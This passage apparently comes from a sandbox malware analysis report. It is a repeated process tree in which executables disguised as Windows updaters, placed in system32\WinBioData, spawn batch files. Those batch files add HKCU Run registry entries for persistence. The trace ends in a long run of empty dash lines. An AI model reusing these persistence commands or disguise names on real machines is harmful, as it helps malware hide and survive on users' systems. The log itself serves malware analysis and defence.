C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"105⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"105⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1B6.tmp\1B7.tmp\1B8.bat C:\Windows\system32\java.exe"106⤵
-
C:\Windows\system32\timeout.exetimeout 1107⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f107⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f107⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f107⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f107⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"107⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"108⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"107⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"107⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5AC.tmp\5AD.tmp\5AE.bat C:\Windows\system32\java.exe"108⤵
-
C:\Windows\system32\timeout.exetimeout 1109⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f109⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f109⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f109⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f109⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"109⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"110⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"109⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"109⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\116E.tmp\116F.tmp\1170.bat C:\Windows\system32\java.exe"110⤵
-
C:\Windows\system32\timeout.exetimeout 1111⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f111⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f111⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f111⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f111⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"111⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"112⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"111⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"111⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\16CB.tmp\16CC.tmp\16CD.bat C:\Windows\system32\java.exe"112⤵
-
C:\Windows\system32\timeout.exetimeout 1113⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f113⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f113⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f113⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f113⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"113⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"114⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"113⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"113⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21E3.tmp\21E4.tmp\21E5.bat C:\Windows\system32\java.exe"114⤵
-
C:\Windows\system32\timeout.exetimeout 1115⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f115⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f115⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f115⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f115⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"115⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"116⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"115⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"115⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2942.tmp\2943.tmp\2944.bat C:\Windows\system32\java.exe"116⤵
-
C:\Windows\system32\timeout.exetimeout 1117⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f117⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f117⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f117⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f117⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"117⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"118⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"117⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"117⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3209.tmp\320A.tmp\320B.bat C:\Windows\system32\java.exe"118⤵
-
C:\Windows\system32\timeout.exetimeout 1119⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f119⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f119⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f119⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f119⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"119⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"120⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"119⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"119⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3997.tmp\3998.tmp\3999.bat C:\Windows\system32\java.exe"120⤵
-
C:\Windows\system32\timeout.exetimeout 1121⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-